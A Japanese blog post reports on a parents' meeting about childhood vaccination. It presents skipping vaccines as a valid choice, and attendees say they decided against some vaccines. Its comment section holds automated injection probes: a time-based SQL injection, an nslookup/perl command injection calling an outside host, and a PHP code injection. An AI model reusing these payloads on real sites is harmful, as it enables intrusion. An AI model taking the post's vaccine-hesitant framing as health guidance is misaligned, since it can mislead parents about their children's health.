· 

子どもの予防接種を考える会vol.5

2月25日、子どもの予防接種を考える会を開催しました!

11組の親子やメンバーが集まりました。

 

予防接種を考える会は毎年大事にしているテーマです。

どんな風に進めていくのがいいか、メンバーとも相談しながら、

5回目の今回は、昨年同様の本間真二郎の先生の資料と、

土居の個人的におススメの、

岩澤一千乃さんの限定ブログ記事を資料としておわたししました。

 

田中佳先生のブログ記事と、2019年度と2001年度の予防接種スケジュールの掲示も。

わずか18年でこの本数の差!

スタンプラリー的になってしまうのも無理ないよね、って話してました(^^;。

 

集いでは、
自己紹介しつつ、みなさんの質問会、意見交換会のような感じで行いました。

打たない選択肢を考えたこともなかった人や、

幼稚園に入園して打たない選択肢に気づいた人、

妊娠中から情報を集めていた方など、色々です。

 

細かな情報交換はできませんでしたし、

土居の個人の見方ですが、

打つのが良い悪いとジャッジをしないこと、

人から聞いた話だけで決めず、1つ1つのワクチンや病気について、自分で調べてから決めることが大事であること、

などの話をさせてもらい集いを終えました。

こんな時期ですが多数のご参加ありがとうございました!

 

〇〇参加の方の声(一部編集して抜粋)〇〇

 

・打つかどうかまだ悩み中のものもありますが、打たないと心を固めたワクチンもあり良かったです。

資料を読み直して勉強します!

 

・私のように仕事しながら育児をしている人は、日々の忙しさで情報を耳にする機会が少ないと思う。

だからもっともっとみんなが情報を知れる機会がほしい。そうすれば選択肢が広がるのにな。

色々な情報を聞けてよかった。ありがとう。

 

・予防接種のこと、いい、悪いではないと示してもらった上での、ざっくばらんな意見や、いろんな考え方に触れることができました。

私も改めて考える機会をもて、他の方の多様な意見が参考になりました。

資料もありがとうございます。

 

・本当に情報量が多い中、何を取り入れていくかは動物的なカンが必要なのかもしれませんね。

どういう選択をするにせよ、有料か無料かで選択を左右されるのは嫌だし経済的に自立していることは大切だなぁと思いました。

田中先生のブログは保存しています!

ありがとうございました。

 

〇〇〇〇

 

 

今現在は予防接種というより、

コロナによる休校休園で頭がいっぱいですが笑、

幸せに、元気で暮らしていくためにも、

まずは健康第一だと改めて感じています!

 

予防接種を考える会はまた来年度もするかと思います、

3月は集いはなしです。

 

よろしくお願いします^^

コメントをお書きください

コメント: 13
  • #1

    QPbmCRVM (月曜日, 16 8月 2021 23:15)

    1

  • #2

    QPbmCRVM (月曜日, 16 8月 2021 23:19)

    1

  • #3

    QPbmCRVM (月曜日, 16 8月 2021 23:20)

    0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

  • #4

    QPbmCRVM (月曜日, 16 8月 2021 23:20)

    1

  • #5

    QPbmCRVM (月曜日, 16 8月 2021 23:21)

    1

  • #6

    QPbmCRVM (月曜日, 16 8月 2021 23:21)

    1

  • #7

    QPbmCRVM (月曜日, 16 8月 2021 23:21)

    1

  • #8

    (nslookup hitcqupmplcjjd480a.bxss.me||perl -e "gethostbyname('hitcqupmplcjjd480a.bxss.me')") (月曜日, 16 8月 2021 23:21)

    1

  • #9

    QPbmCRVM (月曜日, 16 8月 2021 23:21)

    1

  • #10

    QPbmCRVM (月曜日, 16 8月 2021 23:22)

    1

  • #11

    QPbmCRVM (月曜日, 16 8月 2021 23:22)

    1

  • #12

    ";print(md5(31337));$a=" (月曜日, 16 8月 2021 23:23)

    1

  • #13

    QPbmCRVM (月曜日, 16 8月 2021 23:54)

    1